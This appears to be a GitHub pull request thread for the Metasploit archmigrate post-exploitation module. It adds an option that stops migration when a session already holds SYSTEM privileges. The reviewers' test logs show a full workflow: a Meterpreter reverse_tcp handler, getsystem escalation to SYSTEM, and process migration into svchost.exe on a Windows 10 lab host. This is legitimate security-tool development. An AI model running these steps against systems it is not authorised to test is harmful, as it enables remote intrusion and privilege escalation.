### PR TITLE
Add privilege check to archmigrate

### PR DESCRIPTION
**Pull request by cbrnrd**
This PR adds a privilege level check to `archmigrate`. Using the `IGNORE_SYSTEM` datastore option, the user can choose to migrate even if the session has `SYSTEM` privileges. This can prevent accidentally losing `SYSTEM` privileges on a session. If the specified session is not running as `SYSTEM`, the migration will continue.

## Verification

- [x] Start `msfconsole`
- [x] Somehow get SYSTEM on a session
- [x] Do `use post/windows/manage/archmigrate`
- [x] set `IGNORE_SYSTEM` false (if you want to check for SYSTEM)
- [x] Do `run`
- [x] Depending on your privileges and the `IGNORE_SYSTEM` option, you will receive warnings/messages

#### `IGNORE_SYSTEM: false` and is `SYSTEM`

```
msf post(archmigrate) > options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  true                              yes       Migrate even if you have system priveleges
   SESSION        6                                 yes       The session to run this module on.

msf post(archmigrate) > set IGNORE_SYSTEM false
IGNORE_SYSTEM => false
msf post(archmigrate) > run

[-] You are running as SYSTEM! Aborting migration.
[*] Post module execution completed
msf post(archmigrate) >
```

#### `IGNORE_SYSTEM: false` and is _not_ `SYSTEM` 

```
msf post(archmigrate) > run

[*] You're not running as SYSTEM. Moving on...
[+] The meterpreter is the same architecture as the OS!
[*] Post module execution completed
msf post(archmigrate) >
```

### CODE REVIEW

File: modules/post/windows/manage/archmigrate.rb [hunk 1]
```diff
@@ -21,7 +22,8 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
-        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
+        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),
+        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have system priveleges', true])
```
Comment (wvu-r7) [inline modules/post/windows/manage/archmigrate.rb]: s/system/SYSTEM/; s/priveleges/privileges/

File: modules/post/windows/manage/archmigrate.rb [hunk 2]
```diff
@@ -86,4 +88,20 @@ def run
...
+
+
+
+  def run
+      if datastore['IGNORE_SYSTEM']
+        do_migrate
+      elsif !datastore['IGNORE_SYSTEM'] && is_system?
+        print_error('You are running as SYSTEM! Aborting migration.')
+      elsif datastore['IGNORE_SYSTEM'] && is_system?
+        print_error('You are running as SYSTEM! You will lose your priveleges!')
```
Comment (wvu-r7) [inline modules/post/windows/manage/archmigrate.rb]: Same here.

**Comment by bwatters-r7** [comment]
@thecarterb is there a reason the default behavior is to not remind?  I'd think that it makes more sense to warn someone a hundred times than to let them screw themselves once.  I mean, I can completely understand the "You're using a hacking too, you should understand" mentality, but then why add this setting at all?   To be clear, I like this, and I think the warning is justified; I just think the default value should be true.  Am I missing something?

**Comment by thecarterb** [comment]
I think I flipped my logic when originally making that options. Ill change it in a sec. Good catch!

**Comment by bwatters-r7** [comment]
@thecarterb awesome; thanks!  I'll get on with testing this

**Comment by bwatters-r7** [comment]
# Testing
## Windows 10x64 not system
```
msf auxiliary(smb_login) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49778) at 2017-05-23 13:54:46 -0500

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage
[-] Failed to load module: post/windows/manage
msf exploit(handler) > use post/windows/manage/archmigrate 
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  false                             yes       Migrate even if you have SYSTEM privileges
   SESSION                                          yes       The session to run this module on.

msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run

[*] You're not running as SYSTEM. Moving on...
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2716
[*] Migrating..
[+] Success!
[*] Post module execution completed
msf post(archmigrate) > exit

```

## Win10x64 as system
```
msf auxiliary(smb_login) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49779) at 2017-05-23 14:00:01 -0500

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-OQBO9P9\bwatters
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate 
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  false                             yes       Migrate even if you have SYSTEM privileges
   SESSION                                          yes       The session to run this module on.

msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run

[-] You are running as SYSTEM! Aborting migration.
[*] Post module execution completed
msf post(archmigrate) > set IGNORE_SYSTEM true
IGNORE_SYSTEM => true
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  true                              yes       Migrate even if you have SYSTEM privileges
   SESSION        1                                 yes       The session to run this module on.

msf post(archmigrate) > run

[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2328
[*] Migrating..
[+] Success!
[*] Post module execution completed

msf post(archmigrate) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```

**Comment by thecarterb** [comment]
Looks all good to me. Should I add a warning even if `IGNORE_SYSTEM` is `true`?

File: modules/post/windows/manage/archmigrate.rb [hunk 3]
```diff
@@ -86,4 +88,20 @@ def run
       print_good('The meterpreter is the same architecture as the OS!')
     end
   end
+
```
Comment (bwatters-r7) [inline modules/post/windows/manage/archmigrate.rb]: I know I'm nitpicking here, but why the extra white space?

**Comment by thecarterb** [comment]
Scratch that, I just noticed that the warning isn't showing for some reason. I'll test this when I get home

File: modules/post/windows/manage/archmigrate.rb [hunk 4]
```diff
@@ -86,4 +88,20 @@ def run
...
+
+
+  def run
+      if datastore['IGNORE_SYSTEM']
```
Comment (bwatters-r7) [inline modules/post/windows/manage/archmigrate.rb]: This should be indented 2 spaces

**Review by bwatters-r7 — CHANGES_REQUESTED** [review]
Some rubocop stuff

**Comment by bwatters-r7** [comment]
@thecarterb I could go either way on a warning if IGNORE_SYSTEM is true.  I figure they've actively opted out at that point, but a single line is not really that big a deal, either.

**Review by bwatters-r7 — APPROVED** [review]

**Comment by alrosenthal-r7** [comment]
# Release Notes

A privilege level check has been added to the post/windows/manage/archmigrat module. Using the IGNORE_SYSTEM datastore option, you can choose to migrate even if the session has SYSTEM privileges. This can prevent accidentally losing SYSTEM privileges on a session. If the specified session is not running as SYSTEM, the migration will continue.

**Comment by cnotin** [comment]
Hi @cbrnrd I was curious about this option. For me if we're SYSTEM and spawn a new process to migrate into, we'll keep SYSTEM privileges. This is what I observed in my testing too.
Do you know when it could not be the case?

**Comment by cbrnrd** [comment]
I've had it happen to me in the past (a year or so ago when I opened this
PR). Something might have changed where the permissions are retained.

**Comment by cnotin** [comment]
Thanks for your answer. For me when we spawn a process SYSTEM it runs as SYSTEM too. But if you encountered this problem, fine :)

**Pull request merged**